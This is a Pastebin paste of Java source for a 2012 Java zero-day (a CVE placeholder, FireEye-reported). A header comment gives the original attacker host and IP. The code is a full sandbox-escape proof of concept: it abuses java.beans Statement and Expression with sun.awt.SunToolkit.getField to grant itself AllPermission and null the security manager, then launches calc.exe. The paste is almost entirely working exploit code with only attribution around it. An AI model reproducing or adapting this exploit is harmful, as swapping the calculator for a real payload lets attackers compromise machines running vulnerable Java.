SHARE
TWEET

Untitled

a guest Jan 21st, 2013 219 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //
  2. // CVE-2012-XXXX Java 0day
  3. //
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
  5. //
  6. // secret host / ip : ok.aa24.net / 59.120.154.62
  7. //
  8. // regurgitated by jduck
  9. //
  10. // probably a metasploit module soon...
  11. //
  12.  
  13. import java.beans.Expression;
  14. import java.beans.Statement;
  15. import java.lang.reflect.Field;
  16. import java.net.URL;
  17. import java.security.*;
  18. import java.security.cert.Certificate;
  19.  
  20. public class Gondvv
  21. {
  22.  
  23.     public Gondvv()
  24.     {
  25.     }
  26.  
  27.     public static void disableSecurity()
  28.         throws Throwable
  29.     {
  30.         Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  31.         Permissions localPermissions = new Permissions();
  32.         localPermissions.add(new AllPermission());
  33.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  34.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
  35.             localProtectionDomain
  36.         });
  37.         SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  38.         localStatement.execute();
  39.     }
  40.  
  41.     private static Class GetClass(String paramString)
  42.         throws Throwable
  43.     {
  44.         Object arrayOfObject[] = new Object[1];
  45.         arrayOfObject[0] = paramString;
  46.         Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  47.         localExpression.execute();
  48.         return (Class)localExpression.getValue();
  49.     }
  50.  
  51.     private static void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  52.         throws Throwable
  53.     {
  54.         Object arrayOfObject[] = new Object[2];
  55.         arrayOfObject[0] = paramClass;
  56.         arrayOfObject[1] = paramString;
  57.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  58.         localExpression.execute();
  59.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  60.     }
  61.  
  62.     public static void main(String[] args)
  63.     {
  64.         try
  65.         {
  66.             disableSecurity();
  67.             Process localProcess = null;
  68.             localProcess = Runtime.getRuntime().exec("calc.exe");
  69.             if(localProcess != null);
  70.                localProcess.waitFor();
  71.         }
  72.         catch(Throwable localThrowable)
  73.         {
  74.             localThrowable.printStackTrace();
  75.         }
  76.     }
  77.  
  78.    
  79. }
RAW Paste Data
Pastebin PRO Autumn Special!
Get 40% OFF on Pastebin PRO accounts!
Top